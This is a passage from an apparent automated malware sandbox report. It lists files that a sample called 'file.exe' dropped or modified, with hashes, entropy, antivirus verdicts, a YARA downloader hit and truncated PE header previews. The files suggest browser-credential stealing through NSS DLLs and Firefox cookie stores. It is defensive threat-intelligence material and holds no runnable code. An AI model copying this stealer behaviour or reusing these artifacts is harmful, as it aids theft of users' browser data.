SHA-512:	9EC1D0049B15FAEC25724BD552A81DE92AB1C3AE6A0A098B78374108488E84571EED64532BF4D6E6392DCD56EB4944E39B9A08B77D21DFF55485869EE4C79CA8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.3488360343066725
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ25AmIpozQp:YQ3Kq9X0dMgAEiLIj
MD5:	8549C255650427D618EF18B14DFD2B56
SHA1:	8272585186777B344DB3960DF62B00F570D247F6
SHA-256:	40395D9CA4B65D48DEAC792844A77D4F8051F1CEF30DF561DACFEEED3C3BAE13
SHA-512:	E5BB8A0AD338372635C3629E306604E3DC5A5C26FB5547A3DD7E404E5261630612C07326E7EBF5B47ABAFADE8E555965A1A59A1EECFC496DCDD5003048898A8C
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":1}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a99ae233-7b8d-403e-bd2b-2f10da10dd3c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44922
Entropy (8bit):	6.095011886482211
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWo5i1zNt4YNcHKD8FLO7KJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynRY5KtSmd6qE7lFoC
MD5:	DC9B274DA2D9AECE1C609A533D0A74D6
SHA1:	8A1AD0947B02734DFA7A385531EE84D0BBC8B721
SHA-256:	2C9A42A9B86F3D3C05CC623584849176FE84C6A9E1EFE9905C3775FA1D32C374
SHA-512:	CF34CDFDF6FE15FE15602B429647A356860E924450845AD291008E5038B1A11A2419422D3B1447CFAA03104D4F26D8B5213AFCED747D994189546D72D002C519
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\bde767b0-7634-4565-97ea-93edc4f3fdf2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089814894837858
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMVkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynZKkzItSmd6qE7lFoC
MD5:	1F89D28E8E2E6EBB2EC84081FD96ED09
SHA1:	A80267678A7444C5C7A8BE18B1C1312AC7F2F891
SHA-256:	F9A228B40D98383F7C6A7BBF23A5564C8397AE117E3C572CB5748DBD82D7706F
SHA-512:	9EC1D0049B15FAEC25724BD552A81DE92AB1C3AE6A0A098B78374108488E84571EED64532BF4D6E6392DCD56EB4944E39B9A08B77D21DFF55485869EE4C79CA8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c98cf886-810c-43ef-9c3a-0aaa643693f2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44945
Entropy (8bit):	6.095075975328806
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWc5i1zNt4Y9EpAj2A48EcKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynHYNKtSmd6qE7lFoC
MD5:	BB5549F4EE5911520C2DEFC8E363EF17
SHA1:	4D1867D9ECF0ACAEBD78863748AB67ED7BB71688
SHA-256:	0DD8F463A632C1EF96661E963454F1FA65BB82324757AACA39ECED4F676E843F
SHA-512:	52AE0849791A2B047E164E279E355DDE3FA6973DC4CE29B873D54C1DC2D2A5D0BCEB9255E6BB5BECDA5E4C4AA97EC6A2B4829596FE533744A85838977F6B06B0
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3261440
Entropy (8bit):	6.700926779232721
Encrypted:	false
SSDEEP:	49152:xqaVq0qxfgvr3gOl91/ILcJmbMnYUppVEVxHh:xq73xfgD3gOl91/ILc2CpVEf
MD5:	C0D113D521F4055CE2D25BA430F7789D
SHA1:	7A9E6C9CA301B9BBC363B615A6F8C9EA3F199758
SHA-256:	0CDEE686D940E327D736172DBE61168063BFAF253CCA8AD0B37EC2097BC20FCD
SHA-512:	C9567A7B02758846C8AA4E201A01CC807233FDBBFC63EBE2D350388682935CA98313531AFF4C026C31B2FFBB6302E220CD6E68BDD42E1E42475400AA6608A084
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................2......<2...@.................................W...k...........................`.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...bndlrsnx..+.......+.................@...myoyjplj......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.377245721111053
Encrypted:	false
SSDEEP:	48:SfNaoQ7oSTEQ7afNaoQ110Q1hFfNaoQeyQGYfNaoQKs0UrU0U8Qe:6NnQdTEQ+NnQ110Q1fNnQeyQPNnQKs0m
MD5:	8F3DA5E00CF943C655A9180D397512C2
SHA1:	36129D872DB38687817B28AD55BD06747FCD9528
SHA-256:	5B85179E43236D3D42633A7CA92FE39463947DEB484F384E249F39586A7C8758
SHA-512:	10E5E0510D1D3B12C6BDC0A91707FA3246AE9A5A14E1BD22DF470D7D4ECF7E03BF27284CCB50A51A73CA82253BE60DA0632CE1F5DFF9B1519CEBF6E13E9ED8F2
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/8658B673C85B64A1EA814196E44140FA",.. "id": "8658B673C85B64A1EA814196E44140FA",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/8658B673C85B64A1EA814196E44140FA"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/69AFA1D4EF8F81C89D293E4EEC5707BE",.. "id": "69AFA1D4EF8F81C89D293E4EEC5707BE",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/69AFA1D4EF8F81C89D293E4EEC5707BE"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\JoYUT4N[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	503040
Entropy (8bit):	5.039264114641091
Encrypted:	false
SSDEEP:	6144:mC0V1mfJnag3ySCQyEsTdPSMp3b74Ew2+jl6XNgKT:mCW1oZ587L4Ew26l6qw
MD5:	0141BAF82BB318D465D2207BE71876EF
SHA1:	842C96E333BC63B130763369EDB5048DC3CA8241
SHA-256:	F90CAE22E1C93AB14789F1A8C238312BFDB1885A90058F696F7F446E1C922C48
SHA-512:	560202C3668921B0C8C6E25BA59231FEB55D61178E2337F0F70CD2A2CFCD2DCEABE2DF87BFE46B391FC8694BFD64FB34C645FE9997E43AF9026935B67DB6A569
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\JoYUT4N[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5............."...0..T...........r... ........@.. ....................................@..................................r..S........+...............)........................................................... ............... ..H............text....R... ...T.................. ..`.rsrc....+.......,...V..............@..@.reloc..............................@..B.................r......H.......................................................................1.f..4f...f...f...f.T$..T$.f.2..W.......1.f..Wf...f...f...f.T$..T$.f.W........(....V(Z........([...........?...%.(.....%.(2...........?...%.(m....%.(n..........(o..........{...."..}......{...."..}......{...."..}.....s..........sO........^.{.....{....{....(3...^.{.....{ ...{....(3....sX....!.....o....2(...........(....o....o.....3.(....o....o.........(#...b(....s....(....o1......*b(....

C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	503040
Entropy (8bit):	5.039264114641091
Encrypted:	false
SSDEEP:	6144:mC0V1mfJnag3ySCQyEsTdPSMp3b74Ew2+jl6XNgKT:mCW1oZ587L4Ew26l6qw
MD5:	0141BAF82BB318D465D2207BE71876EF
SHA1:	842C96E333BC63B130763369EDB5048DC3CA8241
SHA-256:	F90CAE22E1C93AB14789F1A8C238312BFDB1885A90058F696F7F446E1C922C48
SHA-512:	560202C3668921B0C8C6E25BA59231FEB55D61178E2337F0F70CD2A2CFCD2DCEABE2DF87BFE46B391FC8694BFD64FB34C645FE9997E43AF9026935B67DB6A569
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5............."...0..T...........r... ........@.. ....................................@..................................r..S........+...............)........................................................... ............... ..H............text....R... ...T.................. ..`.rsrc....+.......,...V..............@..@.reloc..............................@..B.................r......H.......................................................................1.f..4f...f...f...f.T$..T$.f.2..W.......1.f..Wf...f...f...f.T$..T$.f.W........(....V(Z........([...........?...%.(.....%.(2...........?...%.(m....%.(n..........(o..........{...."..}......{...."..}......{...."..}.....s..........sO........^.{.....{....{....(3...^.{.....{ ...{....(3....sX....!.....o....2(...........(....o....o.....3.(....o....o.........(#...b(....s....(....o1......*b(....

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Documents\DGCAAFBFBK.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3261440
Entropy (8bit):	6.700926779232721
Encrypted:	false
SSDEEP:	49152:xqaVq0qxfgvr3gOl91/ILcJmbMnYUppVEVxHh:xq73xfgD3gOl91/ILc2CpVEf
MD5:	C0D113D521F4055CE2D25BA430F7789D
SHA1:	7A9E6C9CA301B9BBC363B615A6F8C9EA3F199758
SHA-256:	0CDEE686D940E327D736172DBE61168063BFAF253CCA8AD0B37EC2097BC20FCD
SHA-512:	C9567A7B02758846C8AA4E201A01CC807233FDBBFC63EBE2D350388682935CA98313531AFF4C026C31B2FFBB6302E220CD6E68BDD42E1E42475400AA6608A084
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................2......<2...@.................................W...k...........................`.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...bndlrsnx..+.......+.................@...myoyjplj......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\DGCAAFBFBK.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3261440
Entropy (8bit):	6.700926779232721
Encrypted:	false
SSDEEP:	49152:xqaVq0qxfgvr3gOl91/ILcJmbMnYUppVEVxHh:xq73xfgD3gOl91/ILc2CpVEf
MD5:	C0D113D521F4055CE2D25BA430F7789D
SHA1:	7A9E6C9CA301B9BBC363B615A6F8C9EA3F199758
SHA-256:	0CDEE686D940E327D736172DBE61168063BFAF253CCA8AD0B37EC2097BC20FCD
